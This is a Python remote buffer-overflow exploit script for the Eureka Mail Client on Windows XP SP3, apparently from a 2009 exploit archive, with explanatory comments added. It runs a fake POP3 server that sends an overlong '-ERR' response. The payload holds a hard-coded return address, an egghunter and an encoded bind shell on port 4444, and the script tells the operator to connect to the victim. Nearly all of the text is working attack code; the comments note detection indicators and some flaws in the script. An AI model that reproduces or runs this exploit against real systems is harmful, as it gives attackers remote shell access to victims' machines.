
# Title : Eureka Mail Client Remote Buffer Overflow Exploit
# Published : 2009-11-26
# Author : Dr_IDE and dookie


#!/usr/bin/env python
# Found By: Francis Provencher {PRL}
# Tested On: Windows XPSP3 English
# Note: This script sets up a fake SMTP server
# Note: Set the client to this address and check your mail
##########################################################

import sys, socket

# egghunter (32 bytes)
# First-stage stub. Its 4-byte tag "w00t" (x77x30x30x74 below) is the marker
# it looks for; the payload assembled further down places that tag twice
# ("w00tw00t") directly in front of bindshell. In this rendering the hex
# escapes appear without their backslashes, so as shown the literal is plain
# text rather than 32 bytes.
egghunter = ("x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8"
"x77x30x30x74" # this is the egg: w00t
"x8BxFAxAFx75xEAxAFx75xE7xFFxE7")

# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=thread, LPORT=4444
#
# Second-stage payload. Per the generator header above it is an encoded
# bind shell on TCP 4444 -- the port the script's final status message tells
# the operator to connect to. Detection note: a mail client process opening
# an inbound listener on 4444 right after a mailbox check is the host-side
# indicator that this payload ran. Same rendering caveat as egghunter:
# the hex escapes below are shown without backslashes.
bindshell = ("xbbxd3x82x28x36xd9xc6xd9x74x24xf4x5ex2bxc9xb1"
"x56x83xeexfcx31x5ex0fx03x5exdcx60xddxcax0axed"
"x1ex33xcax8ex97xd6xfbx9cxccx93xa9x10x86xf6x41"
"xdaxcaxe2xd2xaexc2x05x53x04x35x2bx64xa8xf9xe7"
"xa6xaax85xf5xfax0cxb7x35x0fx4cxf0x28xffx1cxa9"
"x27xadxb0xdex7ax6dxb0x30xf1xcdxcax35xc6xb9x60"
"x37x17x11xfex7fx8fx1ax58xa0xaexcfxbax9cxf9x64"
"x08x56xf8xacx40x97xcax90x0fxa6xe2x1dx51xeexc5"
"xfdx24x04x36x80x3exdfx44x5excaxc2xefx15x6cx27"
"x11xfaxebxacx1dxb7x78xeax01x46xacx80x3exc3x53"
"x47xb7x97x77x43x93x4cx19xd2x79x23x26x04x25x9c"
"x82x4exc4xc9xb5x0cx81x3ex88xaex51x28x9bxddx63"
"xf7x37x4axc8x70x9ex8dx2fxabx66x01xcex53x97x0b"
"x15x07xc7x23xbcx27x8cxb3x41xf2x03xe4xedxacxe3"
"x54x4ex1cx8cxbex41x43xacxc0x8bxf2xeax0exefx57"
"x9dx72x0fx46x01xfaxe9x02xa9xaaxa2xbax0bx89x7a"
"x5dx73xfbxd6xf6xe3xb3x30xc0x0cx44x17x63xa0xec"
"xf0xf7xaax28xe0x08xe7x18x6bx31x60xd2x05xf0x10"
"xe3x0fx62xb0x76xd4x72xbfx6ax43x25xe8x5dx9axa3"
"x04xc7x34xd1xd4x91x7fx51x03x62x81x58xc6xdexa5"
"x4ax1exdexe1x3excex89xbfxe8xa8x63x0ex42x63xdf"
"xd8x02xf2x13xdbx54xfbx79xadxb8x4axd4xe8xc7x63"
"xb0xfcxb0x99x20x02x6bx1ax40xe1xb9x57xe9xbcx28"
"xdax74x3fx87x19x81xbcx2dxe2x76xdcx44xe7x33x5a"
"xb5x95x2cx0fxb9x0ax4cx1a")

# Payload layout. The whole thing is delivered as a single POP3 "-ERR"
# response line, so the network-visible indicator of this exploit is a POP3
# server answering a client with a multi-kilobyte -ERR line. The trailing
# ";" on each statement is a harmless no-op in Python.
buff = ("x41" * 710);            # 710-byte filler; presumably the distance to the overwritten return address (see retn comment)
retn = ("x53x93x42x7e"); #JMP ESP USER32.DLL XPSP3 -- hard-coded to one OS/service-pack build
nops = ("x90" * 218);             # 218-byte slide
junk = ("xcc" * 2000);            # 2000 bytes of 0xcc filler
# Order matters to the egghunter: the "w00tw00t" tag sits immediately before bindshell.
sploit = ("-ERR " + buff + retn + egghunter + nops + junk + "w00tw00t" + bindshell);

# Operator banner. It repeats the header's "fake SMTP server" wording, but
# the listener that follows binds TCP 110 and replies with a POP3-style
# "-ERR" line, i.e. it impersonates a POP3 server, not SMTP.
print ("""
##########################################################
#
# Eureka Mail Client Remote Buffer Overflow Exploit (XPSP3)
# Coded By: Dr_IDE and dookie2000ca
# Found By: Francis Provencher {PRL}
# Tested On: Windows XPSP3
# Note: This script sets up a fake SMTP server
# Note: Point the client to this address and check your mail
#
##########################################################
""")

# Rogue POP3 listener: accept one client, then push the payload until the
# peer goes away. The whole block sits under a bare "except:", which also
# swallows a failed bind() (110 is a low port and needs elevated privileges
# on many systems) and KeyboardInterrupt, then prints the "Done" message no
# matter why the block exited -- that final line is not evidence of success.
# The "print '...'" statement on the accept line makes this Python 2 only.
try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.bind(('', 110))   # all interfaces, TCP 110 (POP3), despite the "SMTP" header note
	s.listen(1)
	print ("[*] Listening on port 110.")
	print ("[*] Have someone connect to you.")
	print ("[*] Type <control>-c to exit.")
	conn, addr = s.accept()
	print '[*] Received connection from: ', addr

	# Unbounded: the only exit from this loop is an exception (peer closes the
	# connection, or Ctrl-C), so the conn.close() below is unreachable and the
	# listening socket s is never closed either.
	while 1:
		conn.send(sploit)
	conn.close()
except:
	print ("[*] Done. Wait a bit for the egghunter then connect to the victim on port 4444")